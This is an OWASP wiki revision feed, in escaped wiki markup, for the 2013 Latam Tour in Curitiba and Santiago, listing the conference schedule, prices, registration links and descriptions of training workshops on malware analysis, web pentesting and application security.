| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | U$S 300 não membro / U$S 250 membro OWASP &amp;lt;br&amp;gt; Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt; '''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]''' &amp;lt;br&amp;gt; https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.Para se registrar acesse o seguinte link : &amp;lt;br&amp;gt; '''[http://www.regonline.com/Register/Checkin.aspx?EventId=1212754]''' &amp;lt;br&amp;gt; http://www.regonline.com/Register/Checkin.aspx?EventId=1212754 &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 18:00 - 18:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Abertura do Evento&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Docente da Universidade Positivo&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Breve apresentação sobre a instituição&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 18:15 - 19:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | OWASP: Quem somos e o que fazemos?&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Wagner Elias&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Uma visão geral sobre o projeto OWASP e suas principais iniciativas&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 - 19:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:45 - 20:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |Coffe-Break&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 - 20:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:45 - 21:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:30 - 22:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 22:15 - 23:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_Training&amp;diff=147476</id>
		<title>LatamTour2013 Training</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_Training&amp;diff=147476"/>
				<updated>2013-03-11T12:22:06Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''OWASP LATAM TOUR 2013''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | '''ENTRENAMIENTOS EN LATINOAMERICA''' &lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''CHILE-SANTIAGO'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 18 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Alonso de Ovalle 1586, Santiago Centro&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Penetration Testing Web”'''&lt;br /&gt;
 &lt;br /&gt;
Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.&lt;br /&gt;
&lt;br /&gt;
Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador:''' Ricardo Supo&lt;br /&gt;
OWASP - Perú Chapter Colider&lt;br /&gt;
CTO at Consultoría LimaSoft SAC&lt;br /&gt;
CTO at INZAFE SAC&lt;br /&gt;
10+ años de experiencia en pentesting y desarrollo de software&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.&lt;br /&gt;
&lt;br /&gt;
'''Duración:''' 4 horas (horario mañana 9AM-1PM)&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest1 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Penetration Testing Web”'''&lt;br /&gt;
 &lt;br /&gt;
Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.&lt;br /&gt;
&lt;br /&gt;
Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador:''' Ricardo Supo&lt;br /&gt;
OWASP - Perú Chapter Colider&lt;br /&gt;
CTO at Consultoría LimaSoft SAC&lt;br /&gt;
CTO at INZAFE SAC&lt;br /&gt;
10+ años de experiencia en pentesting y desarrollo de software&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.&lt;br /&gt;
&lt;br /&gt;
'''Duración:''' 4 horas (horario tarde 2PM-6PM)&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest2 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''Brasil-Curitiba'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | 25 de Março&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Introdução a segurança de aplicações'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obter o conhecimento necessário para auditar a segurança de aplicações web e aprender a proteger e resolver estes problemas.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
Este treinamento irá ajudá-lo a ganhar habilidades sobre como avaliar, entender as vulnerabilidades de segurança de uma aplicação web e aprender a lidar com estas falhas de segurança para que eles nunca possam ser exploradas por um hacker. Este curso intensivo de um dia incide sobre os mais comuns problemas de aplicações web de segurança, incluindo aspectos do OWASP Top Ten (2010).&lt;br /&gt;
&lt;br /&gt;
Hands on: Os estudantes vão participar de uma série de exercícios práticos de segurança de testes onde eles atacam uma aplicação web ao vivo (ou seja, WebGoat) que foi semeado com vulnerabilidades de aplicativos comuns da web e, em seguida, usar ferramentas de proxy (ou seja, WebScarab) para completar os exercícios.&lt;br /&gt;
&lt;br /&gt;
Requisitos: Notebook/desktop com VMware/VMplayer instalado, pois será utilizada uma imagem de máquina virtual disponibilizada pelo instrutor.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudantes e profissionais que desejam aprender mais sobre segurança em aplicações web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Iniciante&lt;br /&gt;
&lt;br /&gt;
'''Perfil do Instrutor:''' Wagner Elias&lt;br /&gt;
&lt;br /&gt;
Wagner Elias tem ampla experiência na condução de projetos em IT Security com projetos desenvolvidos em empresas dos mais diversos segmentos. É fundador do capítulo brasileiro da OWASP (Open Web Application Security Project); ocupou o cargo de diretor de conteúdo na gestão 2006-2008 e de eventos da gestão 2008-2010 do capítulo brasileiro da ISSA (Information System Security Association). É co-fundador e sócio da Conviso Application Security, onde atua como CTO (Chief Technical Officer), responsável pela gestão de pesquisa e desenvolvimento de projetos de consultoria em segurança de aplicações.&lt;br /&gt;
&lt;br /&gt;
'''Duração:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Preço:''' U$S300 Não membros / U$S250 Membros OWASP. &lt;br /&gt;
&lt;br /&gt;
'''Para mais informações e preço''': [- Click aqui!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
